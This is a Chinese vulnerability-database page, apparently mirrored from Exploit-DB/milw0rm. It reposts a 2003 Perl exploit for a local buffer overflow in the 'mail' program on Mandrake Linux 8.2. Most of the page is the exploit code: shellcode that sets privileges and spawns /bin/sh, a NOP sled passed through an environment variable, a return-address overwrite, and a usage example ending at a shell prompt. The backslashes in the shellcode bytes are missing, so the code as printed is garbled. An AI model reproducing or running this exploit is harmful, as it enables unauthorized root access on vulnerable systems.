Mandrake Linux 8.2 – ‘/usr/mail’ Local Overflow-安全小百科

Mandrake Linux 8.2 – ‘/usr/mail’ Local Overflow

漏洞ID	1053949	漏洞类型
发布时间	2003-06-10	更新时间	2003-06-10
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/40

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#!/usr/bin/perl
###############################
# Mandrake 8.2 /usr/mail local exploit
#
# Usage:
# perl d86mail.pl [offset]
# Then enter "." (dot) and press 'Enter'
#
# Example:
# [satan@localhost my]$ perl d86mail.pl
# eip: 0xbffffddd
# .[enter]
# Cc: too long to edit
# sh-2.05$
###############################

$shellcode =
   "x31xdbx89xd8xb0x17xcdx80" .
   "x31xdbx89xd8xb0x2excdx80" .
   "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b" .
   "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd" .
   "x80xe8xdcxffxffxff/bin/sh";
$size = 1000;
$size2 = 8204;
$retaddr = 0xbffffddd;
$nop = "x90";
$offset = 0;
if (@ARGV == 1) {
  $offset = $ARGV[0];
}
for ($i = 0; $i < ($size - length($shellcode) - 4); $i++) {
   $buffer .= $nop;
}
for ($i = 0; $i < ($size2); $i++) {
   $buffer2 .= "A";
}
$buffer .= $shellcode;
print "eip: 0x", sprintf('%lx',($retaddr + $offset)), "n";
local($ENV{'EVILBUF'}) = $buffer;
$newret = pack('l', ($retaddr + $offset));
$buffer2 .= $newret;
exec("mail -s wow -c $buffer2 root@localhost");

#EOF


# milw0rm.com [2003-06-10]

相关推荐: Working Resources 1.7.x/2.15 BadBlue – ‘ext.dll’ Command Execution

Working Resources 1.7.x/2.15 BadBlue – ‘ext.dll’ Command Execution 漏洞ID 1053839 漏洞类型发布时间 2003-04-20 更新时间 2003-04-20 CVE编号 N/A CNN…

文章版权归作者所有，未经允许请勿转载。

THE END